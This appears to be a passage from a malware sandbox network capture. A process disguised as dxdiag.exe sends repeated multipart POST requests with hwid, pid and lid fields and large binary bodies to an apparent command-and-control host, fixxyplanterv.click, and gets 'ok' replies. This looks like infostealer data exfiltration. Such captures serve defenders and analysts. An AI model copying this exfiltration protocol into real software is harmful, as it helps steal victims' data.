Data Ascii: QGJyjK0JCms78oRL9Br2aNpreubBCdMAa7+j3VH0fxwDJnWS61RLTzDogQHnUOMh22s5vYdDkURvq+qJHNR2EAIidoXqEQQENuKOS7NC/z/aeHSnwQTTRDDzoMNZ+38RCyZ5nu1UWEw+44ID7lvpLdBgMb2TEdwAZr/qnxzyY1tWYlCD7kFMR3j7wBKrU+NohSc6sI0I2A9jt67RUf51FQcufZjqQ0dBMO6HDudZ7DreZnrwwQTHRDDzjeJr1js
2025-01-13 07:34:29 UTC	1369	IN	Data Raw: 5a 50 31 45 52 49 45 46 4f 65 42 41 4b 74 4c 6f 54 47 64 59 44 62 2b 32 55 50 59 44 47 43 39 71 64 64 58 2b 58 63 61 42 79 52 77 6e 4f 70 65 54 55 30 2f 35 49 67 5a 37 46 6e 6d 4b 4e 5a 75 4d 4c 71 41 43 4a 39 4b 4b 4c 53 79 6b 51 53 31 53 52 77 59 4d 6e 62 55 38 68 39 54 42 44 2f 6f 7a 6c 4f 72 57 66 30 70 32 48 55 2b 73 59 6f 52 31 41 4a 6f 74 72 6a 57 55 50 39 30 47 41 59 76 64 70 7a 2f 55 55 64 45 4b 76 61 49 41 4f 55 55 6f 57 6a 61 66 33 72 6d 77 54 4c 49 44 79 69 73 35 4d 67 63 38 6e 64 62 56 6d 4a 32 6e 75 42 66 57 45 41 2b 37 34 30 46 34 31 48 6e 4c 4e 64 71 4e 62 57 4c 43 74 63 45 5a 37 61 69 32 6c 72 37 65 68 30 43 4c 7a 58 61 72 56 5a 53 42 47 43 6b 71 52 48 6d 55 76 67 35 36 47 41 36 37 38 45 63 6b 52 30 6f 74 4b 61 52 42 4c 56 32 46 77 51 76 Data Ascii: ZP1ERIEFOeBAKtLoTGdYDb+2UPYDGC9qddX+XcaByRwnOpeTU0/5IgZ7FnmKNZuMLqACJ9KKLSykQS1SRwYMnbU8h9TBD/ozlOrWf0p2HU+sYoR1AJotrjWUP90GAYvdpz/UUdEKvaIAOUUoWjaf3rmwTLIDyis5Mgc8ndbVmJ2nuBfWEA+740F41HnLNdqNbWLCtcEZ7ai2lr7eh0CLzXarVZSBGCkqRHmUvg56GA678EckR0otKaRBLV2FwQv
2025-01-13 07:34:29 UTC	1369	IN	Data Raw: 73 4b 57 33 62 39 7a 67 7a 6e 46 4c 64 6f 30 32 6f 38 76 34 41 4c 31 77 52 75 75 61 37 53 56 66 5a 38 45 67 67 70 64 70 37 69 56 6b 78 41 4f 4f 2b 4a 42 65 31 52 35 43 47 64 4b 58 71 35 6d 55 4f 48 52 45 36 51 75 4d 4e 75 2b 33 67 41 54 6a 30 37 6a 61 31 57 52 67 52 67 70 49 55 44 35 45 62 71 49 64 56 6a 4d 37 36 46 43 64 49 44 61 4c 61 6e 31 46 6a 37 66 78 77 4f 4c 6e 71 54 35 56 35 4f 52 44 65 6b 77 45 76 73 54 4b 39 77 6e 55 63 78 71 4b 41 4e 31 42 59 6f 72 4f 54 49 48 50 4a 33 57 31 5a 69 65 35 33 73 57 55 52 49 4d 4f 43 63 43 2b 42 64 34 43 6e 53 5a 7a 6d 2f 69 77 76 4e 41 6d 69 34 6f 74 5a 55 38 58 55 4a 44 79 30 31 32 71 31 57 55 67 52 67 70 4c 38 64 37 46 50 67 61 76 52 67 49 62 2b 4c 41 4e 51 49 4b 4b 7a 6b 79 42 7a 79 64 31 74 57 59 6e 69 59 34 Data Ascii: sKW3b9zgznFLdo02o8v4AL1wRuua7SVfZ8Eggpdp7iVkxAOO+JBe1R5CGdKXq5mUOHRE6QuMNu+3gATj07ja1WRgRgpIUD5EbqIdVjM76FCdIDaLan1Fj7fxwOLnqT5V5ORDekwEvsTK9wnUcxqKAN1BYorOTIHPJ3W1Zie53sWURIMOCcC+Bd4CnSZzm/iwvNAmi4otZU8XUJDy012q1WUgRgpL8d7FPgavRgIb+LANQIKKzkyBzyd1tWYniY4
2025-01-13 07:34:29 UTC	1369	IN	Data Raw: 34 34 34 4a 4c 73 78 54 6b 4a 74 68 6d 4e 72 53 47 44 63 30 46 59 72 2b 72 31 6c 76 2b 61 52 41 63 4b 58 32 58 34 31 6c 44 52 44 62 6b 6a 77 62 72 46 4b 46 6f 32 6e 39 36 35 73 45 6d 2f 42 4e 2b 75 65 6a 79 53 2b 4e 78 48 41 49 30 66 70 58 75 52 30 64 55 65 4b 72 4f 47 75 78 46 72 33 44 4c 64 79 32 35 6e 6b 33 47 52 47 2b 2f 36 6f 6b 63 2f 6e 51 56 41 79 6c 78 6e 65 68 5a 53 55 45 39 37 6f 49 48 36 6c 7a 6d 49 74 68 69 50 4c 53 43 44 64 41 46 5a 4c 65 6a 33 31 57 31 4e 56 73 4a 4f 6a 58 4d 72 57 64 61 51 79 44 70 6e 6b 6e 5a 56 2f 34 35 79 47 6f 71 75 4d 4d 73 33 41 68 72 74 71 33 42 48 4f 6f 31 41 6b 34 6c 65 64 53 31 45 55 70 41 4e 4f 65 4a 42 65 52 5a 34 43 2f 57 61 44 43 77 6b 77 7a 61 44 47 53 37 70 38 4e 57 2f 32 6b 53 42 79 39 37 6e 50 39 53 43 67 Data Ascii: 444JLsxTkJthmNrSGDc0FYr+r1lv+aRAcKX2X41lDRDbkjwbrFKFo2n965sEm/BN+uejyS+NxHAI0fpXuR0dUeKrOGuxFr3DLdy25nk3GRG+/6okc/nQVAylxnehZSUE97oIH6lzmIthiPLSCDdAFZLej31W1NVsJOjXMrWdaQyDpnknZV/45yGoquMMs3Ahrtq3BHOo1Ak4ledS1EUpANOeJBeRZ4C/WaDCwkwzaDGS7p8NW/2kSBy97nP9SCg
2025-01-13 07:34:29 UTC	1369	IN	Data Raw: 42 4b 73 4d 31 6d 69 56 4a 77 58 77 77 52 75 66 58 43 69 47 71 64 39 53 38 6d 30 4b 51 77 4e 34 6e 2b 46 63 52 55 39 34 71 73 34 4e 71 77 79 2f 5a 70 31 6a 4b 2f 37 5a 55 34 31 66 50 65 44 39 67 51 37 71 4e 51 4a 4f 4e 44 58 4d 76 78 38 4b 56 6e 69 38 7a 6b 7a 6f 52 76 30 75 33 6e 45 35 2b 62 38 39 2f 42 4e 2b 75 62 47 54 65 76 4a 71 45 68 67 76 5a 36 72 54 66 30 64 46 4f 2b 72 4d 4f 76 31 5a 2f 79 76 59 59 41 53 41 6a 77 54 4c 41 32 61 31 71 70 45 53 74 58 52 62 56 68 73 31 33 4b 31 75 42 41 51 67 70 4e 5a 4c 33 6c 66 68 4a 74 70 78 4b 2f 4f 69 46 4d 6b 4f 63 2f 47 4d 31 6b 33 38 62 52 59 63 59 6a 76 55 36 78 45 53 46 48 61 6b 69 68 71 72 44 4c 39 36 68 6a 4a 70 36 64 46 52 77 45 70 78 38 37 79 52 42 4b 63 31 57 78 78 69 4c 64 53 71 55 6c 68 57 50 75 65 Data Ascii: BKsM1miVJwXwwRufXCiGqd9S8m0KQwN4n+FcRU94qs4Nqwy/Zp1jK/7ZU41fPeD9gQ7qNQJONDXMvx8KVni8zkzoRv0u3nE5+b89/BN+ubGTevJqEhgvZ6rTf0dFO+rMOv1Z/yvYYASAjwTLA2a1qpEStXRbVhs13K1uBAQgpNZL3lfhJtpxK/OiFMkOc/GM1k38bRYcYjvU6xESFHakihqrDL96hjJp6dFRwEpx87yRBKc1WxxiLdSqUlhWPue
2025-01-13 07:34:29 UTC	1369	IN	Data Raw: 36 46 6f 32 58 5a 36 35 74 46 52 68 46 45 37 35 50 71 44 51 37 74 69 57 78 68 69 4c 63 61 6a 45 56 67 45 59 4b 54 4a 43 50 6c 47 36 53 76 4c 5a 48 32 41 76 7a 62 63 43 6d 61 30 76 4f 52 66 35 48 67 62 42 52 78 4c 74 65 4e 61 54 55 67 75 32 72 41 2b 36 46 72 68 4c 38 74 32 65 76 44 42 44 4a 39 63 55 66 50 69 6b 57 4f 37 4f 77 4e 4f 65 6a 57 68 37 6c 39 45 51 79 37 31 77 7a 37 6f 52 65 77 6f 31 69 64 30 2f 6f 64 44 68 31 59 6d 38 36 37 41 48 4b 30 72 53 56 56 33 4a 73 4f 39 41 31 55 4b 49 61 53 59 53 37 4d 47 6f 57 6a 50 4a 32 4c 2b 78 67 44 4e 46 6d 36 77 76 4e 49 62 79 30 55 39 44 53 56 7a 6c 2b 4e 47 57 77 59 58 35 34 55 48 35 31 50 35 46 75 4e 79 4f 62 43 50 42 4d 6b 56 4b 50 33 71 33 68 79 74 51 6c 73 66 4b 48 4c 59 70 52 31 62 56 7a 62 76 6d 41 79 72 Data Ascii: 6Fo2XZ65tFRhFE75PqDQ7tiWxhiLcajEVgEYKTJCPlG6SvLZH2AvzbcCma0vORf5HgbBRxLteNaTUgu2rA+6FrhL8t2evDBDJ9cUfPikWO7OwNOejWh7l9EQy71wz7oRewo1id0/odDh1Ym867AHK0rSVV3JsO9A1UKIaSYS7MGoWjPJ2L+xgDNFm6wvNIby0U9DSVzl+NGWwYX54UH51P5FuNyObCPBMkVKP3q3hytQlsfKHLYpR1bVzbvmAyr

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49732	172.67.134.197	443	2596	C:\Windows\SysWOW64\dxdiag.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 07:34:30 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=0JL8RU06MMF9E User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18131 Host: fixxyplanterv.click
2025-01-13 07:34:30 UTC	15331	OUT	Data Raw: 2d 2d 30 4a 4c 38 52 55 30 36 4d 4d 46 39 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 31 30 33 30 44 44 36 32 38 34 36 42 35 42 37 35 45 43 36 34 36 38 43 35 43 39 36 33 32 34 39 0d 0a 2d 2d 30 4a 4c 38 52 55 30 36 4d 4d 46 39 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 30 4a 4c 38 52 55 30 36 4d 4d 46 39 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 5a 71 63 68 4f 61 2d 2d 6e 65 77 0d 0a 2d 2d 30 4a 4c 38 52 55 30 36 4d 4d 46 39 45 Data Ascii: --0JL8RU06MMF9EContent-Disposition: form-data; name="hwid"A1030DD62846B5B75EC6468C5C963249--0JL8RU06MMF9EContent-Disposition: form-data; name="pid"2--0JL8RU06MMF9EContent-Disposition: form-data; name="lid"ZqchOa--new--0JL8RU06MMF9E
2025-01-13 07:34:30 UTC	2800	OUT	Data Raw: 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 Data Ascii: ^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTw
2025-01-13 07:34:31 UTC	1129	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 07:34:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=9jk06pumcf4a229a030bqegahi; expires=Fri, 09 May 2025 01:21:10 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X6l2fg1BROLcHe%2BzsRV%2B2KGdu6w2OdX48omoKyJMRqvOzrFEPWhnNJjoqHGUi1arUmmvaP0PI6oX5gfaepWMI6pidJcUtiIsMen%2BEIp7MnFb3n9pgl1n8OPlYoKkoqOqiwNbupqb"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9013b44aa886431f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1576&min_rtt=1570&rtt_var=602&sent=10&recv=22&lost=0&retrans=0&sent_bytes=2847&recv_bytes=19091&delivery_rate=1796923&cwnd=250&unsent_bytes=0&cid=9a67d93bd47b5d4a&ts=543&x=0"
2025-01-13 07:34:31 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-13 07:34:31 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49733	172.67.134.197	443	2596	C:\Windows\SysWOW64\dxdiag.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 07:34:31 UTC	275	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=XIT4MVOB7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8728 Host: fixxyplanterv.click
2025-01-13 07:34:31 UTC	8728	OUT	Data Raw: 2d 2d 58 49 54 34 4d 56 4f 42 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 31 30 33 30 44 44 36 32 38 34 36 42 35 42 37 35 45 43 36 34 36 38 43 35 43 39 36 33 32 34 39 0d 0a 2d 2d 58 49 54 34 4d 56 4f 42 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 58 49 54 34 4d 56 4f 42 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 5a 71 63 68 4f 61 2d 2d 6e 65 77 0d 0a 2d 2d 58 49 54 34 4d 56 4f 42 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 Data Ascii: --XIT4MVOB7Content-Disposition: form-data; name="hwid"A1030DD62846B5B75EC6468C5C963249--XIT4MVOB7Content-Disposition: form-data; name="pid"2--XIT4MVOB7Content-Disposition: form-data; name="lid"ZqchOa--new--XIT4MVOB7Content-Dispos
2025-01-13 07:34:32 UTC	1127	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 07:34:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=bh5q5kjds0eurtd23krmpu65uh; expires=Fri, 09 May 2025 01:21:11 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mC51q1STvlLctlkxttBA9rD10taevz6zd5fsPb3vRqRkPwMhogomXJgd%2FS6PDmjAUIO7DurCPEdJ73jpgL%2FBC8%2FuWnde17iGJFtRcxsNjeXbsFgRe044tNCbxp93DzEfQYJTHN5i"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9013b451ed9f7c87-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1803&min_rtt=1797&rtt_var=687&sent=7&recv=13&lost=0&retrans=0&sent_bytes=2847&recv_bytes=9661&delivery_rate=1578378&cwnd=213&unsent_bytes=0&cid=dbcdbc04ee1a5e67&ts=517&x=0"
2025-01-13 07:34:32 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-13 07:34:32 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49734	172.67.134.197	443	2596	C:\Windows\SysWOW64\dxdiag.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 07:34:33 UTC	277	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=FRX9K6DEPQ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20387 Host: fixxyplanterv.click
2025-01-13 07:34:33 UTC	15331	OUT	Data Raw: 2d 2d 46 52 58 39 4b 36 44 45 50 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 31 30 33 30 44 44 36 32 38 34 36 42 35 42 37 35 45 43 36 34 36 38 43 35 43 39 36 33 32 34 39 0d 0a 2d 2d 46 52 58 39 4b 36 44 45 50 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 46 52 58 39 4b 36 44 45 50 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 5a 71 63 68 4f 61 2d 2d 6e 65 77 0d 0a 2d 2d 46 52 58 39 4b 36 44 45 50 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 Data Ascii: --FRX9K6DEPQContent-Disposition: form-data; name="hwid"A1030DD62846B5B75EC6468C5C963249--FRX9K6DEPQContent-Disposition: form-data; name="pid"3--FRX9K6DEPQContent-Disposition: form-data; name="lid"ZqchOa--new--FRX9K6DEPQContent-Di
2025-01-13 07:34:33 UTC	5056	OUT	Data Raw: 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc 40 f0 eb b1 64 f0 52 3c 78 29 Data Ascii: lrQMn 64F6(X&7~`aO@dR<x)
2025-01-13 07:34:34 UTC	1139	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 07:34:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ahfpcdf7bphqhvhtggfjutc67l; expires=Fri, 09 May 2025 01:21:12 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LVH2pYP4JrUrJ9Vl%2FBK3%2FRPqJHZtlpQNADnxjfW6yErnufwNYxA7%2F3YgHHMAY2hSF6POgaWPR%2B0f%2BCjHzfIk%2BaYJBMV9AvyHhunrhzzRIZ6zgCCrQgwwFoLIZPy0eV1yFO%2BB%2FXFP"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9013b45aa97142f5-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1575&min_rtt=1571&rtt_var=597&sent=12&recv=24&lost=0&retrans=0&sent_bytes=2846&recv_bytes=21344&delivery_rate=1820448&cwnd=195&unsent_bytes=0&cid=a3e8b4e6d4d4ec32&ts=953&x=0"
2025-01-13 07:34:34 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-13 07:34:34 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49735	172.67.134.197	443	2596	C:\Windows\SysWOW64\dxdiag.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 07:34:35 UTC	279	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=CH7TYY8CL3UKH User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1218 Host: fixxyplanterv.click
2025-01-13 07:34:35 UTC	1218	OUT	Data Raw: 2d 2d 43 48 37 54 59 59 38 43 4c 33 55 4b 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 31 30 33 30 44 44 36 32 38 34 36 42 35 42 37 35 45 43 36 34 36 38 43 35 43 39 36 33 32 34 39 0d 0a 2d 2d 43 48 37 54 59 59 38 43 4c 33 55 4b 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 43 48 37 54 59 59 38 43 4c 33 55 4b 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 5a 71 63 68 4f 61 2d 2d 6e 65 77 0d 0a 2d 2d 43 48 37 54 59 59 38 43 4c 33 55 4b 48 Data Ascii: --CH7TYY8CL3UKHContent-Disposition: form-data; name="hwid"A1030DD62846B5B75EC6468C5C963249--CH7TYY8CL3UKHContent-Disposition: form-data; name="pid"1--CH7TYY8CL3UKHContent-Disposition: form-data; name="lid"ZqchOa--new--CH7TYY8CL3UKH
2025-01-13 07:34:35 UTC	1126	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 07:34:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=jr90e4cki8tvu0mm42kvjke8tc; expires=Fri, 09 May 2025 01:21:14 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GnM%2FJbxGFAOuNi6vYXJnKRFle4RKwYlPVsb8gdBxhgphNqSHGJ0i4n9xeo83%2F0%2FnAEsAuaQHKmIR2FPwQyfDPVADbibYsykihX34678YROSebiLyMhE8w2hR1dWawwihSVfOqMh6"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9013b466cb65de99-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1624&min_rtt=1618&rtt_var=619&sent=5&recv=9&lost=0&retrans=0&sent_bytes=2848&recv_bytes=2133&delivery_rate=1748502&cwnd=217&unsent_bytes=0&cid=dcad4d7d1f9b7c8c&ts=445&x=0"
2025-01-13 07:34:35 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-13 07:34:35 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49736	172.67.134.197	443	2596	C:\Windows\SysWOW64\dxdiag.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 07:34:36 UTC	279	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=142Z09EQZZS User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 551118 Host: fixxyplanterv.click
2025-01-13 07:34:36 UTC	15331	OUT	Data Raw: 2d 2d 31 34 32 5a 30 39 45 51 5a 5a 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 31 30 33 30 44 44 36 32 38 34 36 42 35 42 37 35 45 43 36 34 36 38 43 35 43 39 36 33 32 34 39 0d 0a 2d 2d 31 34 32 5a 30 39 45 51 5a 5a 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 31 34 32 5a 30 39 45 51 5a 5a 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 5a 71 63 68 4f 61 2d 2d 6e 65 77 0d 0a 2d 2d 31 34 32 5a 30 39 45 51 5a 5a 53 0d 0a 43 6f 6e 74 65 6e Data Ascii: --142Z09EQZZSContent-Disposition: form-data; name="hwid"A1030DD62846B5B75EC6468C5C963249--142Z09EQZZSContent-Disposition: form-data; name="pid"1--142Z09EQZZSContent-Disposition: form-data; name="lid"ZqchOa--new--142Z09EQZZSConten
